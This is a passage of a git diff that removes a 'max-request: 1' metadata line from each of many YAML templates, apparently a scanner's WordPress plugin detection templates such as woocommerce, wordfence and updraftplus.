photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml 